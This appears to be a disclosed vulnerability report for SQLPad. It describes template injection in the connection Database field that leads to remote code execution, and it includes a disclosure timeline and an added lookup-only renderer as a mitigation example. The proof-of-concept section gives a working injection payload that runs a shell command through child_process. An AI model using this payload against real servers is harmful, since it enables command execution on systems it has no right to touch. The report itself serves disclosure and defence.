Template injection in connection test endpoint leads to RCE in sqlpad/sqlpad

Valid

Reported on Mar 11th 2022


Description


Proof of Concept

  • Run a local Docker instance:
    sudo docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:latest
  • Navigate to http://localhost:3000/
  • Click on Connections -> Add connection
  • Choose MySQL as the driver
  • Input the following payload into the Database form field:
    {{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}
  • Execute the following command to confirm that the /tmp/pwn file was created in the container filesystem:
    sudo docker exec -it sqlpad cat /tmp/pwn

Impact

A SQLPad web application user with admin rights can run arbitrary commands on the underlying server, because the Database connection field is rendered as a template whose expressions are evaluated rather than treated as plain text.
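The mitigation for this class of bug is to never evaluate the text inside a connection-field placeholder, only to look it up. The following is an added example, not SQLPad's code or its fix: a lookup-only renderer that accepts an allowlist of placeholder names (the names `user.name` and `user.email` are assumptions) and rejects any other expression, plus an audit helper that flags stored connection fields the renderer would refuse.

```javascript
// Added example (not SQLPad's code): a lookup-only renderer for connection
// fields. Placeholders are resolved against an allowlist by name and are never
// evaluated, so the report's "{{ process.mainModule.require(...) }}" payload
// is rejected instead of executed. Variable names are assumptions.
const ALLOWED_VARIABLES = new Set(['user.name', 'user.email']);

// Captures the raw text between "{{" and "}}", whitespace included.
const PLACEHOLDER = /\{\{([\s\S]*?)\}\}/g;

// Returns every placeholder expression that is not a plain allowlisted name.
// An empty array means the field contains nothing but lookups.
function findDisallowedPlaceholders(fieldValue) {
  const bad = [];
  for (const match of String(fieldValue).matchAll(PLACEHOLDER)) {
    const name = match[1].trim();
    if (!ALLOWED_VARIABLES.has(name)) bad.push(name);
  }
  return bad;
}

// Substitutes allowlisted placeholders by object lookup and throws on
// anything else. `variables` is keyed by the dotted names above (assumption).
function renderConnectionField(fieldValue, variables) {
  const disallowed = findDisallowedPlaceholders(fieldValue);
  if (disallowed.length > 0) {
    throw new Error(`Unsupported placeholder(s): ${disallowed.join(', ')}`);
  }
  return String(fieldValue).replace(PLACEHOLDER, (_whole, inner) => {
    const value = variables[inner.trim()];
    return value === undefined ? '' : String(value);
  });
}

// Audit helper for stored connections: lists each string field holding an
// expression the lookup-only renderer would refuse, for review or alerting.
function auditConnection(connection) {
  const findings = [];
  for (const [field, value] of Object.entries(connection)) {
    if (typeof value !== 'string') continue;
    for (const expression of findDisallowedPlaceholders(value)) {
      findings.push({ field, expression });
    }
  }
  return findings;
}

// Constructed sample input: a benign field and the payload from the report.
const VARIABLES = { 'user.name': 'alice', 'user.email': 'alice@example.com' };
const SAFE_FIELD = 'reporting_{{ user.name }}';
const PAYLOAD = "{{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}";
```

Running `auditConnection` over every saved connection is a quick way to find fields that already carry such expressions before the upgrade.
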

We are processing your report and will contact the sqlpad team within 24 hours. 3 months ago
We have contacted a member of the sqlpad team and are waiting to hear back 2 months ago
sqlpad/sqlpad maintainer validated this vulnerability 2 months ago
Daniel Santos has been awarded the disclosure bounty
The fix bounty is now up for grabs
Daniel Santos (Researcher), 2 months ago:

Please donate the bounty to a charity of your choice.

sqlpad/sqlpad maintainer confirmed that a fix has been merged on 3f92be 2 months ago
The fix bounty has been dropped
render-connection.js#L23 has been validated